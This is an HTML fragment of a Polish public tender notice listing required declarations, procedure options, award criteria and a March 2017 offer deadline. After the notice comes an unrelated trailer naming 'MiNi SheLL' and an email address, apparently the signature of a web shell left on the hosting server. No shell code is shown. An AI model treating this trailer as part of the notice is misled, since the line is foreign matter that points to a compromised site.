                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Zgodnie z art. 24 ust. 11 Pzp wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>warunki dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/03/2017, godzina: 08:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com